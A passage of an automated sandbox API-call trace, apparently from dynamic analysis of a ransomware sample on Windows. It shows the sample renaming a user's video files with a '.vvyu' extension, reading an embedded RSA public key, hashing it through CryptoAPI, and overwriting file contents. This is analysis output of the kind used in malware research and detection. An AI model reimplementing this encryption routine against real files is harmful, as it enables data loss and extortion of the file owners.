hHeap=0x6a0000) returned 1 [0196.377] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\32xDz.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\32xdz.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\32xDz.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\32xdz.mkv.vvyu")) returned 1 [0196.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0196.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.381] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0196.384] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef3c3610, ftCreationTime.dwHighDateTime=0x1d89ea6, ftLastAccessTime.dwLowDateTime=0x8d8881e0, ftLastAccessTime.dwHighDateTime=0x1d8a52b, ftLastWriteTime.dwLowDateTime=0x8d8881e0, ftLastWriteTime.dwHighDateTime=0x1d8a52b, nFileSizeHigh=0x0, nFileSizeLow=0x10458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NNZzOSSfvX.mp4", cAlternateFileName="NNZZOS~1.MP4")) returned 1 [0196.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0196.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xbe) returned 0x2c5b3e8 [0196.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0196.384] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\NNZzOSSfvX.mp4") returned=".mp4" [0196.384] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\NNZzOSSfvX.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\nnzzossfvx.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0196.385] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=66648) returned 1 [0196.385] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0196.388] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x10432, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.388] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0196.389] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.389] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x10458, lpOverlapped=0x0) returned 1 [0196.390] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0196.390] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.390] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.390] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0196.391] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0196.391] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.391] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0196.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0196.391] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0196.391] GetLastError () returned 0x0 [0196.391] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0196.391] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0196.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0196.392] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0196.392] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0196.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0196.392] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0196.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0196.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10460) returned 0x2d4b778 [0196.392] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0196.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0196.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0196.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0196.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0196.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2ce48 [0196.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a240 [0196.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2ce90 [0196.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a258 [0196.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a288 [0196.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2e8 [0196.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2a0 [0196.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0196.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0196.393] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0196.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0196.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a288 | out: hHeap=0x6a0000) returned 1 [0196.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2a0 | out: hHeap=0x6a0000) returned 1 [0196.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2e8 | out: hHeap=0x6a0000) returned 1 [0196.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0196.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2e8 [0196.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0196.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a2a0 [0196.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0196.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a288 [0196.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0196.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2be2220 [0196.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0196.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0196.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0196.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0196.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0196.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0196.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2a0 | out: hHeap=0x6a0000) returned 1 [0196.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0196.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a288 | out: hHeap=0x6a0000) returned 1 [0196.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0196.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0196.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2e8 | out: hHeap=0x6a0000) returned 1 [0196.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0196.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0196.396] GetCurrentThreadId () returned 0x264 [0196.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0196.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d47320 [0196.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0196.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0196.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0196.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0196.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0196.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0196.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.397] GetCurrentThreadId () returned 0x264 [0196.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.398] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2c03ca0 [0196.398] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.398] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0196.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0196.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0196.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0196.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0196.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0ec50 [0196.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0196.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2e8 [0196.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0196.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0196.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0196.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0196.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0196.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0196.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0196.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0196.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a288 [0196.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0196.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0196.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0196.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0196.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0196.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0196.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0196.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a2a0 [0196.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0196.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0196.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0196.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a270 [0196.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0196.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a300 [0196.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0196.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0196.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0196.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2d0 [0196.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0196.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2b8 [0196.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0196.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a318 [0196.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2b8 | out: hHeap=0x6a0000) returned 1 [0196.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a2b8 [0196.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2d0 | out: hHeap=0x6a0000) returned 1 [0196.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0196.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0196.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0196.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0196.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0196.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a288 | out: hHeap=0x6a0000) returned 1 [0196.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a288 [0196.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0196.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0196.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2e8 | out: hHeap=0x6a0000) returned 1 [0196.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0196.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a318 | out: hHeap=0x6a0000) returned 1 [0196.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0196.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0d0a0 [0196.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0196.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0196.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a288 | out: hHeap=0x6a0000) returned 1 [0196.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0196.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0196.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0196.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0196.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0196.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0196.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0196.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0196.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0196.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0196.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0196.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0d0a0 | out: hHeap=0x6a0000) returned 1 [0196.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0196.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2b8 | out: hHeap=0x6a0000) returned 1 [0196.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0196.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a300 | out: hHeap=0x6a0000) returned 1 [0196.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0196.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2a0 | out: hHeap=0x6a0000) returned 1 [0196.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a270 | out: hHeap=0x6a0000) returned 1 [0196.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0196.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0196.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0196.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a258 | out: hHeap=0x6a0000) returned 1 [0196.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ce90 | out: hHeap=0x6a0000) returned 1 [0196.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0196.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0196.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0196.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0196.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0196.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0196.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0196.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0196.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0196.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0196.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0196.410] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4b778*, nNumberOfBytesToWrite=0x10453, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4b778*, lpNumberOfBytesWritten=0x30ffb14*=0x10453, lpOverlapped=0x0) returned 1 [0196.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4b778 | out: hHeap=0x6a0000) returned 1 [0196.411] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x10458, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 